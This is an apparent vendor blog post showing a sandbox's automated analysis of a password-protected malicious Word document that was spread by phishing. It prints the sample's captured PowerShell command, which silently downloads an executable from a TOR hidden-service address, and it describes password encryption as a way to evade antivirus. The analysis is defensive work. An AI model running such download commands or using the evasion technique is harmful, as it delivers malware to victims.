Password Protected Word Document Connects to TOR Hidden Service
Password protected documents are an effective method for malware to bypass anti-virus (AV) and other detection solutions. Typically the AV will not be able to parse the password required from the text of the email used to send the malicious document. With VMRay Analyzer, it has always been possible to manually interact with malware using browser based VNC access. By disabling automatic interaction, users can manually enter the password during the process of interacting with malware.
In VMRay Analyzer v2.1, we’ve completely automated this process. Now users will be able to provide a password at the time of submission and the password will be entered during the behavioral analysis (Figure 1). This added functionality will remove the manual process thus saving DFIR Specialists and Malware Analysts valuable time.
We recently found a sample (thanks to Michael Gillespie) to demonstrate the enhanced automated analysis of password protected documents in VMRay Analyzer v2.1.
The Microsoft Word Document was propagated via an email designed to trick the user into opening the malicious attachment through social engineering. According to Forrester, social engineering attacks, like this, are the second most common type companies have faced over the past 12 months. A wary security analyst, upon getting a report of a potentially dangerous email like this, might upload the file to VirusTotal or another public analysis tool. However, since the document is password protected, it’s automatically encrypted. There is no way either a public analyzer or the user’s own AV can correctly analyze this document without knowing the password.
The password is only mentioned in the email (“See attachment […]. Password is 5558.”). So if you only have access to the attachment, you won’t be able to analyze it properly. This is also why this attack technique is great at staying undetected – just changing the password will lead to a different document. Virustotal scores 0 / 56 (Figure 2) in other words, no AV detected it as malicious.
With VMRay Analyzer v2.1, we are able to take the password, found within the body of the e-mail and enter it before analysis. After the analysis is done, we can see that the malware author tries to trick the user into believing the “Can’t View” message comes from Microsoft Word, so he should allow macros to run.
Our simulated user interaction is, of course, the best case scenario in every attacker’s eyes (and the worst case scenario for every sysadmin): VMRay Analyzer will do whatever is asked of it – like open the document and let macros run.
Let’s look at the spawned processes after a user enables macros to get a feel of what this malware does (Figure 4):
The macros start a batch file which then starts PowerShell to download and execute the actual payload:
powershell.exe -w hidden "(New-Object System.Net.WebClient). DownloadFile('hxxp://fbbkvm7ezghq4dx3.onion.link/msbus24.exe',' C:\Users\HJRD1K~1\AppData\Local\Temp\msbus24.exe')"
Interestingly, this connects to a TOR hidden service, which is often seen in ransomware – of course, this behavior is a huge red flag, because there is basically no legitimate reason to hide an executable file behind TOR. This behavior is marked as a malicious in the ‘Detected Threats’ section of the Analysis Report (Figure 5).
As demonstrated with this analysis, the added support for automated password protected document analysis in VMRay Analyzer v2.1 gives DFIR Specialists and CERTs another tool in their arsenal to facilitate and automate the fight against malware.
View the Full Password Protected Word Document Analysis